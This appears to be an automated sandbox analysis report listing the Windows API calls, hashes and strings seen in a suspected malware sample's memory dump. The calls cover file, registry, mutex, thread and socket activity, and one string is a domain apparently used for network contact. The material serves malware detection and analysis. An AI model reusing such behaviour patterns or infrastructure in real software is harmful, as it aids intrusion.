                control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->572 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                APIs
                • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$AllocCreateReadVirtual
                • String ID: .tmp
                • API String ID: 3585551309-2986845003
                • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                APIs
                • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                • GetLastError.KERNEL32 ref: 0041399E
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Error$CreateLastModeMutex
                • String ID:
                • API String ID: 3448925889-0
                • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                APIs
                • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$CreatePointerWrite
                • String ID:
                • API String ID: 3672724799-0
                • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                APIs
                • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                  • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                  • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                  • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Heap$CreateFreeProcessThread_wmemset
                • String ID: ckav.ru
                • API String ID: 2915393847-2696028687
                • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                APIs
                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                • _wmemset.LIBCMT ref: 0040634F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocateProcess_wmemset
                • String ID: CA
                • API String ID: 2773065342-1052703068
                • Opcode ID: 7ce7633a075ddea787b33ce87c6c428a1d74d746fa12bb75d4846fd50f5e3e20
                • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                • Opcode Fuzzy Hash: 7ce7633a075ddea787b33ce87c6c428a1d74d746fa12bb75d4846fd50f5e3e20
                • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                APIs
                • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: InformationToken
                • String ID: IDA
                • API String ID: 4114910276-365204570
                • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                APIs
                • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc
                • String ID: s1@
                • API String ID: 190572456-427247929
                • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                APIs
                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocateOpenProcessQueryValue
                • String ID:
                • API String ID: 1425999871-0
                • Opcode ID: 7bf50091bcfb9a02a13952a1e8bd1f425a35c82d03e3d9e3531f97b66e5a18c7
                • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                • Opcode Fuzzy Hash: 7bf50091bcfb9a02a13952a1e8bd1f425a35c82d03e3d9e3531f97b66e5a18c7
                • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                APIs
                • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CheckMembershipToken
                • String ID:
                • API String ID: 1351025785-0
                • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                APIs
                • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CreateDirectory
                • String ID:
                • API String ID: 4241100979-0
                • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                APIs
                • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: InfoNativeSystem
                • String ID:
                • API String ID: 1721193555-0
                • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                APIs
                • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: send
                • String ID:
                • API String ID: 2809346765-0
                • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                APIs
                • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: FileMove
                • String ID:
                • API String ID: 3562171763-0
                • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                APIs
                • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Startup
                • String ID:
                • API String ID: 724789610-0
                • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                APIs
                • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                APIs
                • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Open
                • String ID:
                • API String ID: 71445658-0
                • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                APIs
                • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: DeleteFile
                • String ID:
                • API String ID: 4033686569-0
                • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                APIs
                • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                APIs
                • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseFind
                • String ID:
                • API String ID: 1863332320-0
                • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                APIs
                • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                APIs
                • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                APIs
                • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExistsFilePath
                • String ID:
                • API String ID: 1174141254-0
                • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                APIs
                • closesocket.WS2_32(00404EB0), ref: 00404DEB
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: closesocket
                • String ID:
                • API String ID: 2781271927-0
                • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                APIs
                • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: FreeVirtual
                • String ID:
                • API String ID: 1263568516-0
                • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                APIs
                • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle
                • String ID:
                • API String ID: 2962429428-0
                • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                APIs
                • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                APIs
                • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                APIs
                • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                APIs
                • CoInitialize.OLE32(00000000), ref: 0040438F
                • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                • VariantInit.OLEAUT32(?), ref: 004043C4
                • SysAllocString.OLEAUT32(?), ref: 004043CD
                • VariantInit.OLEAUT32(?), ref: 00404414
                • SysAllocString.OLEAUT32(?), ref: 00404419
                • VariantInit.OLEAUT32(?), ref: 00404431
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
